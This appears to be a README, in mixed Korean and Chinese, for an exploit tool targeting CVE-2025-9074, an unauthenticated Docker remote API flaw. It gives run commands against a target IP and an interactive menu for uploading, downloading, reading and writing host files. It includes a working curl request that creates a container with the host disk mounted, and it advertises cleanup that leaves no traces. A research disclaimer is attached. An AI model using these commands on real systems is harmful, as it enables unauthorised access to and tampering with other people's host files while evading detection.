
Docker 원격 API 취약점을 악용하는 강력한 도구로, CVE-2025-9074 취약점의 보안 연구 및 테스트를 위해 사용됩니다.
CVE-2025-9074 취약점의 보안 연구 및 테스트를 위한 강력한 Docker 원격 API 취약점 활용 도구입니다.
✅ 완전 자동 컨테이너 수명 주기 관리: 임시 컨테이너를 자동으로 생성하고 작업 완료 후 자동으로 정리하여 흔적을 남기지 않음
✅ 스마트 경로 처리: Windows 경로를 자동으로 인식하여 Docker 마운트 형식으로 변환
✅ 완전 자동화 작업 흐름: 복잡한 명령을 수동으로 입력할 필요 없이 메뉴 방식 인터랙션으로 원클릭 파일 작업 완료
✅ 크로스 플랫폼 호환: Windows 및 Linux 시스템 완벽 지원
컨테이너 작업
이미지 관리
호스트 파일 작업
CVE-2025-9074는 Docker 원격 API의 보안 취약점으로, 공격자는 Docker API에 무단 액세스하여 다음을 수행할 수 있습니다:
requirements.txt를 사용하여 모든 종속성을 설치합니다:
pip install -r requirements.txt
또는 수동으로 설치:
pip install requests docker websocket-client
기본 Docker API 주소를 사용하여 스크립트를 직접 실행합니다:
python CVE-2025-9074-docker-exploit.py
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
python CVE-2025-9074-docker-exploit.py [选项]
选项:
-u, --url URL Docker API 地址(默认: http://192.168.65.7:2375)
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名):
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!
이 도구는 Windows Docker Desktop의 경로 매핑을 자동으로 처리합니다:
| Windows 경로 | Docker 마운트 경로 |
|---|
지원되는 입력 형식:
D:\ 또는 D:/D:\temp 또는 D:/temp"D:\file.txt" (따옴표 포함)'D:/file.txt' (따옴표 포함)⚠️ 중요 알림:
Docker API를 통해 컨테이너를 생성하고 호스트 디스크를 마운트합니다:
curl -X POST "http://<target>:2375/containers/create" \
-H "Content-Type: application/json" \
-d '{
"Image": "python:3.11.7",
"Cmd": ["sleep", "999d"],
"HostConfig": {
"Binds": ["/mnt/host/d:/tmp"]
},
"Tty": true
}'
컨테이너에서 명령을 실행하여 호스트 파일을 읽고 씁니다:
# 写入文件
echo "content" > /tmp/file.txt
# 读取文件
cat /tmp/file.txt
pip install docker websocket-clientpython CVE-2025-9074-docker-exploit.py
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│ ├── get_containers()
│ ├── display_containers()
│ ├── create_container()
│ ├── stop_container()
│ └── delete_container()
├── 镜像管理函数
│ ├── get_images()
│ ├── display_images()
│ ├── pull_image()
│ └── remove_image()
├── 宿主机文件操作函数
│ ├── upload_file_to_host()
│ ├── download_file_from_host()
│ ├── read_file_from_host()
│ └── write_file_to_host()
└── 工具函数
├── normalize_host_path()
├── create_container_with_mount()
├── start_container()
└── stop_and_remove_container()
Issue 및 Pull Request를 환영합니다!
이 프로젝트는 교육 및 보안 연구 목적으로만 제공됩니다.
이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다. 사용자는 이 도구를 사용함으로 인해 발생하는 모든 책임과 위험을 스스로 부담해야 합니다. 작성자는 이 도구의 어떠한 남용 또는 무단 사용 행위에 대해서도 책임을 지지 않습니다.
D:\ | /mnt/host/d |
D:\temp | /mnt/host/d/temp |
C:\Windows | /mnt/host/c/Windows |
C:\Users\test | /mnt/host/c/Users/test |